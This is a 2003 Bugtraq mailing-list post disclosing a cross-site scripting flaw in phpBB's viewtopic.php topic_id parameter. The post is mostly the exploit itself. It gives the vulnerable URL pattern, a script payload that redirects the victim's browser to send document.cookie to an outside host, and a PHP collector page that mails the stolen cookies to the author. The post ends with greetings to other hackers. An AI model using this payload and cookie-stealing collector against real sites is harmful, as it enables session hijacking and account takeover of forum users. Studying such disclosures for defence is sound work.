XSS Exploit In phpBB viewtopic.php

From: silent needle (silentneedle_at_hotmail.com)
Date: 06/21/03

  • Next message: Rushjo_at_tripbit.org: "TA-2003-06 Denial of Service Attack against Armida Databased Web Server v1.0"
    Date: 21 Jun 2003 10:07:12 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    XSS Exploit In phpBB viewtopic.php

    A: BACKGROUND [from phpbb.com]
    phpBB is a high powered, fully scalable, and highly customisable open-
    source bulletin board package. phpBB has a user-friendly interface, simple
    and straightforward administration panel, and helpful FAQ. Based on the
    powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL
    or Access/ODBC database servers, phpBB is the ideal free community
    solution for all web sites.

    B: DESCRIPTION
    The cross site scripting allow you to print a html or javascript or others
    in the webpage
    when it just open not write in the page.

    C: EXPLOIT
    This is the URLs of the exploit:
    http://[site]/phpBB/viewtopic.php?topic_id=[script]

    And you can steal cookie by changing [script] to
    <script>document.location='http://any-web-
    site/cookies.php?'+document.cookie</script>
    and in http://any-web-site/cookie.php put
    ----------------cookie.php-------------------
    <?
    mail("silentneedle@hotmail.com","cookies from phpbb",$http_cookie);
    echo $http_cookie; //or you can send with the variable name
    ?>
    -----------------------------------------------

    D: GREETZ
    To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , 7azm , King Of Ray , OH SHE
    IS A LITTLE RUN AWAY[puretone & kelly osbourne] :)
    and thanks to the last exploit in phpbb :)

    E: CONTACT
    Silent Needle
    silentneedle@hotmail.com

    F: OH LONG NIGHT
    Bye


  • Next message: Rushjo_at_tripbit.org: "TA-2003-06 Denial of Service Attack against Armida Databased Web Server v1.0"

    Relevant Pages